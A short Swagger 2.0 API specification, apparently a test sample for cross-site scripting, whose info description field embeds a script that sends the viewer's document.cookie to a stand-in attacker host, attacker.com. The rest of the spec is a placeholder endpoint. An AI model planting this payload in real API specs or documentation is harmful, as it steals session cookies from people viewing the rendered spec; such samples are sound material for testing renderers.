swagger: '2.0'
info:
  title: Example API
  description: |
    <script>
      fetch('http://attacker.com/steal?cookie=' + document.cookie);
    </script>
paths:
  /endpoint:
    get:
      responses:
        '200':
          description: OK
      tags:
      - example
      operationId: exampleOperation
      summary: Example Operation
